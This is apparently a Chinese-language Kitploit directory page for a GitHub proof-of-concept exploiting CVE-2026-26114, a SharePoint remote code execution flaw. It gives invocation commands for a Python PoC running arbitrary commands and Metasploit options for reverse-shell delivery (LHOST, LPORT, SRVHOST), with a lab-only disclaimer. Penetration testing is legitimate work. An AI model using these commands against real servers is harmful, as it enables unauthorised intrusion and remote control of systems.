Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2026-26114-poc — 针对CVE-2026-26114的概念验证漏洞利用,这是Microsoft SharePoint中的一个远程代码执行漏洞,包含Python PoC和Metasploit模块,用于自动化利用和反向shell传递。 | Kitploit
工具/GitHubGitHub/huynambka/cve-2026-26114-poc
漏洞利用框架漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制红队Payload 开发
GitHubhuynambka/cve-2026-26114-poc

cve-2026-26114-poc

针对CVE-2026-26114的概念验证漏洞利用,这是Microsoft SharePoint中的一个远程代码执行漏洞,包含Python PoC和Metasploit模块,用于自动化利用和反向shell传递。

查看仓库
23922个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-26114

仅限在实验室或获准测试的系统中使用。

Python PoC

root@kitploit:~
pip install requests requests-ntlm

python poc/cve_2026_26114_rce.py ^
  --target http://sharepoint.local ^
  --username sp_user1 ^
  --password "Password123!" ^
  --domain SP19 ^
  --cmd "cmd /c whoami > C:\Windows\Temp\cve_2026_26114.txt"

可以使用 --proxy http://127.0.0.1:8080、--insecure,或将 --cmd 替换为 --marker-file C:\Windows\Temp\marker.txt。

Metasploit 模块

模块位于:

root@kitploit:~
modules/exploits/windows/http/sharepoint_cve_2026_26114.rb

示例选项:

root@kitploit:~
use exploit/windows/http/sharepoint_cve_2026_26114 set RHOSTS sharepoint.local set RPORT 80 set SSL false set TARGETURI / set USERNAME sp_user1 set PASSWORD Password123! set DOMAIN SP19 set SRVHOST 192.168.56.1 set SRVPORT 8080 set LHOST 192.168.56.1 set LPORT 4444 check run

如果不使用自动发现,请额外设置 TAXONOMY_STORE_ID、TAXONOMY_GROUP_ID、SITE_ID、WEB_ID、JOB_CREATOR_ID。

下载工具